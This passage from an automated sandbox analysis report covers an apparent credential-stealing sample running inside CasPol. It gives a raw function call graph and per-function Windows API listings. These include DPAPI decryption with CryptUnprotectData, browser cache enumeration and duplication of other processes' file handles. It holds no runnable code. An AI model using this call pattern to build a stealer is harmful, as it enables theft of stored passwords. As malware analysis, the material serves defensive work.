FreeLibrary 38600->38602 38603 40b633 free 38601->38603 38602->38601 38604 413d42 38603->38604 38605 40b633 free 38604->38605 38606 413d4a 38605->38606 38606->38140 38607->38144 38608->38192 38609->38207 38611 44db70 38610->38611 38612 40b6fc memset 38611->38612 38613 409c70 2 API calls 38612->38613 38614 40b732 wcsrchr 38613->38614 38615 40b743 38614->38615 38616 40b746 memset 38614->38616 38615->38616 38617 40b2cc 27 API calls 38616->38617 38618 40b76f 38617->38618 38619 409d1f 6 API calls 38618->38619 38620 40b783 38619->38620 39178 409b98 GetFileAttributesW 38620->39178 38622 40b792 38623 40b7c2 38622->38623 38625 409c70 2 API calls 38622->38625 39179 40bb98 38623->39179 38627 40b7a5 38625->38627 38630 40b2cc 27 API calls 38627->38630 38628 40b837 CloseHandle 38632 40b83e memset 38628->38632 38629 40b817 39262 409a45 GetTempPathW 38629->39262 38633 40b7b2 38630->38633 39212 40a6e6 
WideCharToMultiByte 38632->39212 38634 409d1f 6 API calls 38633->38634 38634->38623 38635 40b827 CopyFileW 38635->38632 38637 40b866 39213 444432 38637->39213 38640 40bad5 38641 40baeb 38640->38641 38642 40bade DeleteFileW 38640->38642 38645 40b04b ??3@YAXPAX 38641->38645 38642->38641 38643 40b273 27 API calls 38644 40b89a 38643->38644 39259 438552 38644->39259 38647 40baf3 38645->38647 38647->38216 38649 40bacd 39293 443d90 111 API calls 38649->39293 38652 40bac6 39292 424f26 123 API calls 38652->39292 38653 40b8bd memset 39283 425413 17 API calls 38653->39283 38656 425413 17 API calls 38674 40b8b8 38656->38674 38659 40a71b MultiByteToWideChar 38659->38674 38660 40a734 MultiByteToWideChar 38660->38674 38663 40b9b5 memcmp 38663->38674 38664 4099c6 2 API calls 38664->38674 38665 404423 38 API calls 38665->38674 38668 40bb3e memset memcpy 39294 40a734 MultiByteToWideChar 38668->39294 38669 4251c4 137 API calls 38669->38674 38671 40bb88 LocalFree 38671->38674 38674->38652 38674->38653 38674->38656 38674->38659 38674->38660 38674->38663 38674->38664 38674->38665 38674->38668 38674->38669 38675 40ba5f memcmp 38674->38675 39284 4253ef 16 API calls 38674->39284 39285 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38674->39285 39286 4253af 17 API calls 38674->39286 39287 4253cf 17 API calls 38674->39287 39288 447280 memset 38674->39288 39289 447960 memset memcpy memcpy memcpy 38674->39289 39290 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38674->39290 39291 447920 memcpy memcpy memcpy 38674->39291 38675->38674 38676->38218 38678 40aebe FindClose 38677->38678 38679 40ae21 38678->38679 38680 4099c6 2 API calls 38679->38680 38681 40ae35 38680->38681 38682 409d1f 6 API calls 38681->38682 38683 40ae49 38682->38683 38683->38259 38685 40ade0 38684->38685 38686 40ae0f 38684->38686 38685->38686 38687 40ade7 wcscmp 38685->38687 38686->38259 38687->38686 38688 40adfe wcscmp 38687->38688 38688->38686 38690 40ae7b FindNextFileW 38689->38690 38691 40ae5c FindFirstFileW 38689->38691 38692 
40ae94 38690->38692 38693 40ae8f 38690->38693 38691->38692 38695 40aeb6 38692->38695 38696 409d1f 6 API calls 38692->38696 38694 40aebe FindClose 38693->38694 38694->38692 38695->38259 38696->38695 38698 40aed1 38697->38698 38699 40aec7 FindClose 38697->38699 38698->38273 38699->38698 38701 4099d7 38700->38701 38702 4099da memcpy 38700->38702 38701->38702 38702->38202 38704 40b2cc 27 API calls 38703->38704 38705 44543f 38704->38705 38706 409d1f 6 API calls 38705->38706 38707 44544f 38706->38707 39652 409b98 GetFileAttributesW 38707->39652 38709 44545e 38710 445476 38709->38710 38711 40b6ef 253 API calls 38709->38711 38712 40b2cc 27 API calls 38710->38712 38711->38710 38713 445482 38712->38713 38714 409d1f 6 API calls 38713->38714 38715 445492 38714->38715 39653 409b98 GetFileAttributesW 38715->39653 38717 4454a1 38718 4454b9 38717->38718 38719 40b6ef 253 API calls 38717->38719 38718->38230 38719->38718 38720->38229 38721->38247 38722->38255 38723->38294 38724->38276 38725->38321 38726->38321 38727->38303 38728->38332 38729->38334 38730->38336 38732 414c2e 17 API calls 38731->38732 38733 40c2ae 38732->38733 38789 40c1d3 38733->38789 38738 40c3be 38755 40a8ab 38738->38755 38739 40afcf 2 API calls 38740 40c2fd FindFirstUrlCacheEntryW 38739->38740 38741 40c3b6 38740->38741 38742 40c31e wcschr 38740->38742 38743 40b04b ??3@YAXPAX 38741->38743 38744 40c331 38742->38744 38745 40c35e FindNextUrlCacheEntryW 38742->38745 38743->38738 38746 40a8ab 9 API calls 38744->38746 38745->38742 38747 40c373 GetLastError 38745->38747 38748 40c33e wcschr 38746->38748 38749 40c3ad FindCloseUrlCache 38747->38749 38750 40c37e 38747->38750 38748->38745 38751 40c34f 38748->38751 38749->38741 38752 40afcf 2 API calls 38750->38752 38753 40a8ab 9 API calls 38751->38753 38754 40c391 FindNextUrlCacheEntryW 38752->38754 38753->38745 38754->38742 38754->38749 38883 40a97a 38755->38883 38758 40a8cc 38758->38343 38759 40a8d0 7 API calls 38759->38758 38888 40b1ab free free 38760->38888 38762 40c3dd 
38763 40b2cc 27 API calls 38762->38763 38764 40c3e7 38763->38764 38889 414592 RegOpenKeyExW 38764->38889 38766 40c3f4 38767 40c50e 38766->38767 38768 40c3ff 38766->38768 38782 405337 38767->38782 38769 40a9ce 4 API calls 38768->38769 38770 40c418 memset 38769->38770 38890 40aa1d 38770->38890 38773 40c471 38775 40c47a _wcsupr 38773->38775 38774 40c505 RegCloseKey 38774->38767 38776 40a8d0 7 API calls 38775->38776 38777 40c498 38776->38777 38778 40a8d0 7 API calls 38777->38778 38779 40c4ac memset 38778->38779 38780 40aa1d 38779->38780 38781 40c4e4 RegEnumValueW 38780->38781 38781->38774 38781->38775 38892 405220 38782->38892 38785->38354 38786->38356 38787->38357 38788->38350 38790 40ae18 9 API calls 38789->38790 38791 40c210 38790->38791 38792 40ae51 9 API calls 38791->38792 38793 40c264 38791->38793 38794 40add4 2 API calls 38791->38794 38797 40c231 _wcsicmp 38791->38797 38798 40c1d3 35 API calls 38791->38798 38792->38791 38795 40aebe FindClose 38793->38795 38794->38791 38796 40c26f 38795->38796 38801 40e5ed memset memset 38796->38801 38797->38791 38799 40c248 38797->38799 38798->38791 38814 40c084 22 API calls 38799->38814 38802 414c2e 17 API calls 38801->38802 38803 40e63f 38802->38803 38804 409d1f 6 API calls 38803->38804 38805 40e658 38804->38805 38815 409b98 GetFileAttributesW 38805->38815 38807 40e667 38808 40e680 38807->38808 38809 409d1f 6 API calls 38807->38809 38816 409b98 GetFileAttributesW 38808->38816 38809->38808 38811 40e68f 38812 40c2d8 38811->38812 38817 40e4b2 38811->38817 38812->38738 38812->38739 38814->38791 38815->38807 38816->38811 38838 40e01e 38817->38838 38819 40e593 38820 40e5b0 38819->38820 38821 40e59c DeleteFileW 38819->38821 38822 40b04b ??3@YAXPAX 38820->38822 38821->38820 38824 40e5bb 38822->38824 38823 40e521 38823->38819 38861 40e175 38823->38861 38826 40e5c4 CloseHandle 38824->38826 38827 40e5cc 38824->38827 38826->38827 38829 40b633 free 38827->38829 38828 40e573 38831 40e584 38828->38831 38832 40e57c CloseHandle 38828->38832 
38830 40e5db 38829->38830 38834 40b633 free 38830->38834 38882 40b1ab free free 38831->38882 38832->38831 38833 40e540 38833->38828 38881 40e2ab 30 API calls 38833->38881 38836 40e5e3 38834->38836 38836->38812 38839 406214 22 API calls 38838->38839 38840 40e03c 38839->38840 38841 40e16b 38840->38841 38842 40dd85 75 API calls 38840->38842 38841->38823 38843 40e06b 38842->38843 38843->38841 38844 40afcf ??2@YAPAXI ??3@YAXPAX 38843->38844 38845 40e08d OpenProcess 38844->38845 38846 40e152 38845->38846 38847 40e0a4 GetCurrentProcess DuplicateHandle 38845->38847 38850 406214 22 API calls 38846->38850 38854 40e160 38846->38854 38848 40e0d0 GetFileSize 38847->38848 38849 40e14a CloseHandle 38847->38849 38852 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38848->38852 38849->38846 38850->38854 38851 40b04b ??3@YAXPAX 38851->38841 38853 40e0ea 38852->38853 38855 4096dc CreateFileW 38853->38855 38854->38851 38856 40e0f1 CreateFileMappingW 38855->38856 38857 40e140 CloseHandle CloseHandle 38856->38857 38858 40e10b MapViewOfFile 38856->38858 38857->38849 38859 40e13b CloseHandle 38858->38859 38860 40e11f WriteFile UnmapViewOfFile 38858->38860 38859->38857 38860->38859 38862 40e18c 38861->38862 38863 406b90 11 API calls 38862->38863 38864 40e19f 38863->38864 38865 40e1a7 memset 38864->38865 38866 40e299 38864->38866 38872 40e1e8 38865->38872 38867 4069a3 ??3@YAXPAX free 38866->38867 38869 40e2a4 38867->38869 38868 406e8f 13 API calls 38868->38872 38869->38833 38870 406b53 SetFilePointerEx ReadFile 38870->38872 38871 40dd50 _wcsicmp 38871->38872 38872->38868 38872->38870 38872->38871 38873 40e283 38872->38873 38877 40742e 8 API calls 38872->38877 38878 40aae3 wcslen wcslen _memicmp 38872->38878 38879 40e244 _snwprintf 38872->38879 38874 40e291 38873->38874 38875 40e288 free 38873->38875 38876 40aa04 free 38874->38876 38875->38874 38876->38866 38877->38872 38878->38872 38880 40a8d0 7 API calls 38879->38880 38880->38872 38881->38833 38882->38819 38884 40a980 
38883->38884 38885 40a995 _wcsicmp 38884->38885 38886 40a99c wcscmp 38884->38886 38887 40a8bb 38884->38887 38885->38884 38886->38884 38887->38758 38887->38759 38888->38762 38889->38766 38891 40aa23 RegEnumValueW 38890->38891 38891->38773 38891->38774 38893 405335 38892->38893 38894 40522a 38892->38894 38893->38357 38895 40b2cc 27 API calls 38894->38895 38896 405234 38895->38896 38897 40a804 8 API calls 38896->38897 38898 40523a 38897->38898 38937 40b273 38898->38937 38900 405248 _mbscpy _mbscat GetProcAddress 38901 40b273 27 API calls 38900->38901 38902 405279 38901->38902 38940 405211 GetProcAddress 38902->38940 38904 405282 38905 40b273 27 API calls 38904->38905 38906 40528f 38905->38906 38941 405211 GetProcAddress 38906->38941 38908 405298 38909 40b273 27 API calls 38908->38909 38910 4052a5 38909->38910 38942 405211 GetProcAddress 38910->38942 38912 4052ae 38913 40b273 27 API calls 38912->38913 38914 4052bb 38913->38914 38943 405211 GetProcAddress 38914->38943 38916 4052c4 38917 40b273 27 API calls 38916->38917 38918 4052d1 38917->38918 38944 405211 GetProcAddress 38918->38944 38920 4052da 38921 40b273 27 API calls 38920->38921 38922 4052e7 38921->38922 38945 405211 GetProcAddress 38922->38945 38924 4052f0 38925 40b273 27 API calls 38924->38925 38926 4052fd 38925->38926 38946 405211 GetProcAddress 38926->38946 38928 405306 38929 40b273 27 API calls 38928->38929 38930 405313 38929->38930 38947 405211 GetProcAddress 38930->38947 38932 40531c 38933 40b273 27 API calls 38932->38933 38934 405329 38933->38934 38948 405211 GetProcAddress 38934->38948 38936 405332 38936->38893 38938 40b58d 27 API calls 38937->38938 38939 40b18c 38938->38939 38939->38900 38940->38904 38941->38908 38942->38912 38943->38916 38944->38920 38945->38924 38946->38928 38947->38932 38948->38936 38950 40440c FreeLibrary 38949->38950 38951 40436d 38950->38951 38952 40a804 8 API calls 38951->38952 38953 404377 38952->38953 38954 404383 38953->38954 38955 404405 38953->38955 38956 40b273 27 API calls 
38954->38956 38955->38361 38955->38365 38957 40438d GetProcAddress 38956->38957 38958 40b273 27 API calls 38957->38958 38959 4043a7 GetProcAddress 38958->38959 38960 40b273 27 API calls 38959->38960 38961 4043ba GetProcAddress 38960->38961 38962 40b273 27 API calls 38961->38962 38963 4043ce GetProcAddress 38962->38963 38964 40b273 27 API calls 38963->38964 38965 4043e2 GetProcAddress 38964->38965 38966 4043f1 38965->38966 38967 4043f7 38966->38967 38968 40440c FreeLibrary 38966->38968 38967->38955 38968->38955 38970 404413 FreeLibrary 38969->38970 38971 40441e 38969->38971 38970->38971 38971->38377 38972->38371 38974 40447e 38973->38974 38975 40442e 38973->38975 38976 404485 CryptUnprotectData 38974->38976 38977 40449c 38974->38977 38978 40b2cc 27 API calls 38975->38978 38976->38977 38977->38371 38979 404438 38978->38979 38980 40a804 8 API calls 38979->38980 38981 40443e 38980->38981 38982 404445 38981->38982 38983 404467 38981->38983 38984 40b273 27 API calls 38982->38984 38983->38974 38986 404475 FreeLibrary 38983->38986 38985 40444f GetProcAddress 38984->38985 38985->38983 38987 404460 38985->38987 38986->38974 38987->38983 38989 4135f6 38988->38989 38990 4135eb FreeLibrary 38988->38990 38989->38380 38990->38989 38992 4449c4 38991->38992 38993 444a52 38991->38993 38994 40b2cc 27 API calls 38992->38994 38993->38400 38993->38405 38995 4449cb 38994->38995 38996 40a804 8 API calls 38995->38996 38997 4449d1 38996->38997 38998 40b273 27 API calls 38997->38998 38999 4449dc GetProcAddress 38998->38999 39000 40b273 27 API calls 38999->39000 39001 4449f3 GetProcAddress 39000->39001 39002 40b273 27 API calls 39001->39002 39003 444a04 GetProcAddress 39002->39003 39004 40b273 27 API calls 39003->39004 39005 444a15 GetProcAddress 39004->39005 39006 40b273 27 API calls 39005->39006 39007 444a26 GetProcAddress 39006->39007 39008 40b273 27 API calls 39007->39008 39009 444a37 GetProcAddress 39008->39009 39010 40b273 27 API calls 39009->39010 39011 444a48 GetProcAddress 
[Function call graph: serialized node/edge list (node ids, code addresses, API names and API call counts) from the report's interactive graph widget; not reproduced here.]

Control-flow Graph

Legend: • Executed • Not Executed

[Control-flow graph of the function at 0040DD85 (basic-block edge list rendered by the report's interactive graph widget). The listed blocks call memset, CreateFileW, NtQuerySystemInformation, CloseHandle, GetCurrentProcessId, OpenProcess, GetCurrentProcess, DuplicateHandle and _wcsicmp, with subcalls to 409bca, 40afcf, 41352f, 413cfa, 413d4c, 40e6ad, 409c52 and 413d29.]
APIs
• memset.MSVCRT ref: 0040DDAD
  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
• CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040DDD4
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation,?,000000FF,00000000,00000104), ref: 00413559
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver,?,000000FF,00000000,00000104), ref: 0041356B
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver,?,000000FF,00000000,00000104), ref: 0041357D
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject,?,000000FF,00000000,00000104), ref: 0041358F
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject,?,000000FF,00000000,00000104), ref: 004135A1
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject,?,000000FF,00000000,00000104), ref: 004135B3
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess,?,000000FF,00000000,00000104), ref: 004135C5
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess,?,000000FF,00000000,00000104), ref: 004135D7
• NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
• CloseHandle.KERNELBASE(C0000004), ref: 0040DE3E
• GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
• _wcsicmp.MSVCRT ref: 0040DEB2
• _wcsicmp.MSVCRT ref: 0040DEC5
• _wcsicmp.MSVCRT ref: 0040DED8
• OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
• GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
• DuplicateHandle.KERNEL32(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
• memset.MSVCRT ref: 0040DF5F
• CloseHandle.KERNEL32(C0000004), ref: 0040DF92
• _wcsicmp.MSVCRT ref: 0040DFB2
• CloseHandle.KERNEL32(00000104), ref: 0040DFF2
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
• String ID: dllhost.exe$taskhost.exe$taskhostex.exe
• API String ID: 708747863-3398334509
• Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
• Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
• Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
• Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

Control-flow Graph (rendered graph not reproduced)

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                                                                                                                                    • memset.MSVCRT ref: 00413D7F
                                                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                                                                    • memset.MSVCRT ref: 00413E07
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                                                                                    • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
                                                                                                                                                                                    • CloseHandle.KERNELBASE(?), ref: 00413EA8
                                                                                                                                                                                    • free.MSVCRT ref: 00413EC1
                                                                                                                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00413F1A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Handle$CloseProcessProcess32freememset$AddressCreateFirstFullImageModuleNameNextOpenProcQuerySnapshotToolhelp32
                                                                                                                                                                                    • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                                    • API String ID: 3536422406-1740548384
                                                                                                                                                                                    • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                                                                                    • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                                                                    • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                                                                                    • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                                                                                    • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                                                    • String ID: BIN
                                                                                                                                                                                    • API String ID: 1668488027-1015027815
                                                                                                                                                                                    • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                    • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                      • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                      • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                    • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                                                                    • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                                                                    • free.MSVCRT ref: 00418803
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1355100292-0
                                                                                                                                                                                    • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                                                    • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404453
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 767404330-0
                                                                                                                                                                                    • Opcode ID: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                                                                                                                                    • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                                                                                                                                    • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
APIs
• FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
• FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: FileFind$FirstNext
• String ID:
• API String ID: 1690352074-0
• Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
• Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
• Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
• Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
APIs
• memset.MSVCRT ref: 0041898C
• GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: InfoSystemmemset
• String ID:
• API String ID: 3558857096-0
• Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
• Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
• Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
• Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

Control-flow Graph

Function 0044553B: basic blocks 44553b through 445fb2; the interactive graph marks which blocks were executed during the run and which were not.
APIs
• memset.MSVCRT ref: 004455C2
• wcsrchr.MSVCRT ref: 004455DA
• memset.MSVCRT ref: 0044570D
• memset.MSVCRT ref: 00445725
  • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
  • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
  • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
  • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
  • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
  • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
  • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000,000000F1,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 0041362A
• memset.MSVCRT ref: 0044573D
• memset.MSVCRT ref: 00445755
• memset.MSVCRT ref: 004458CB
• memset.MSVCRT ref: 004458E3
• memset.MSVCRT ref: 0044596E
• memset.MSVCRT ref: 00445A10
• memset.MSVCRT ref: 00445A28
• memset.MSVCRT ref: 00445AC6
  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
  • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
  • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
  • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
  • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
  • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000), ref: 004450F7
• memset.MSVCRT ref: 00445B52
• memset.MSVCRT ref: 00445B6A
• memset.MSVCRT ref: 00445C9B
• memset.MSVCRT ref: 00445CB3
• _wcsicmp.MSVCRT ref: 00445D56
• memset.MSVCRT ref: 00445B82
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
